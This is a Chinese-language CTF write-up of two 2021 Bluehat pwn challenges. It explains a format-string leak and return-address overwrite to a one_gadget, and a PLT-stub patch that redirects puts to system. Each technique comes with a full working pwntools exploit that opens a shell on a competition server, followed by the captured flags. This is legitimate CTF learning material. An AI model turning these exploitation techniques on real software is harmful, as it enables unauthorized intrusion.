2021 bluehat-s wp
好久没发过博客了,难得想起这个事情,适逢昨天刚打完比赛,👴就顺手发一篇吧
pwn
早上九点开赛,大概11点左右就ak了pwn(就两道pwn),然后都是在摸鱼了
附件传到百度网盘了,有兴趣的师傅可以下载来玩一下
链接: https://pan.baidu.com/s/1RLpfC0LEGPJkKif8COnNpg 密码: eq90
hangman
程序大致逻辑是,先输入一段字符串,随后输入字符,统计字符串中与该字符相等的字符数目,并将数目累加到局部变量上,当局部变量与字符串长度相等时,会赢得一轮游戏,并且存在一个格式化字符串漏洞,利用该漏洞泄漏libc基地址,栈地址,改写存放libc_start_main+240的位置,将_libc_start_main+240改成one_gadget,然后正常结束程序即可getshell 脚本有时不能打通,运行多几次即可
exp
from pwn import*
import sys
binary = './pwn'
elf = ELF(binary)
#nc 118.190.62.234 33445
ip = '118.190.62.234'
port = 33445
if sys.argv[1] == 'r':
p = remote(ip,port)
libc = ELF('./libc-2.23.so')
else :
p = process(binary)
libc = elf.libc
context.os = 'linux'
#context.log_level = 'debug'
context.arch = 'amd64'
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
rl = lambda : p.recvline(keepends = False)
ss = lambda s : success(s)
dbg = lambda : gdb.attach(p)
irt = lambda : p.interactive()
def pwn():
# gdb.attach(p,'b * ($rebase)(0x13C5)')
sla('word:','%29$ppp%24$p')
sla('letter:','p')
sla('letter:','p')
sla('letter:','p')
ru('0x')
leak = rc(12)
lbase = int(leak,16)- 240 -libc.sym['__libc_start_main'] # __libc_start_main+240
ss('LIBC:'+hex(lbase))
ru('0x')
leak = rc(12)
main_ret = int(leak,16)+8
ss('main_ret:'+hex(main_ret))
one_gadget = 0x45226+lbase
ss('one_gadget:'+hex(one_gadget))
o1 = one_gadget & 0xffff
o2 = (one_gadget>>16) & 0xffff
o3 = (one_gadget>>32) & 0xffff
ss('o1:'+hex(o1))
ss('o2:'+hex(o2))
ss('o3:'+hex(o3))
payload = '%{0}c%15$hn'.format(o1)
payload = payload.ljust(14,'n') # len = 14
payload = payload.ljust(24,'a') # len = 24 [14:24] = 'a'
payload = payload.encode()
payload += p64(main_ret)
sla('word:',payload)
sla('letter:','a')
sla('letter:','a')
sla('letter:','a')
payload = '%{0}c%15$hn'.format(o2)
payload = payload.ljust(14,'n') # len = 14
payload = payload.ljust(24,'a') # len = 24 [14:24] = 'a'
payload = payload.encode()
payload += p64(main_ret+2)
sla('word:',payload)
sla('letter:','a')
sla('letter:','a')
sla('letter:','a')
sla('word:','a')
sla('letter:','a')
irt()
if __name__ == '__main__':
pwn()
'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
flag
flag{4e20e122-d87d-452e-b7ee-b88f5acf890f}
cover
程序开始读入5字节,前4字节为地址,可以将最后一字节,写入该地址中,程序最后会读入一段输入,并执行puts输出,攻击思路就是修改puts的plt表中的跳转代码,在跳转到got表时,程序会push一个偏移,只需将puts的偏移修改为system的偏移,既可劫持puts的plt表跳转到system,执行system('/bin/sh')
exp
from pwn import*
import sys
binary = './pwn'
elf = ELF(binary)
#nc 118.190.62.234 12435
ip = '118.190.62.234'
port = 12435
if sys.argv[1] == 'r':
p = remote(ip,port)
# libc = ELF('./libc.so.6')
else :
p = process(binary)
libc = elf.libc
context.os = 'linux'
context.log_level = 'debug'
context.arch = 'amd64'
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
rl = lambda : p.recvline(keepends = False)
ss = lambda s : success(s)
dbg = lambda : gdb.attach(p)
irt = lambda : p.interactive()
# 0x080484D0 puts_got 0x80484dc \x80
def pwn():
sa('this','\xd7\x84\x04\x08\x30')
sleep(2)
sd('/bin/sh\x00')
irt()
if __name__ == '__main__':
pwn()
flag
flag{f7d89ad6-8c5a-4f0d-ae41-2410ab8855b6}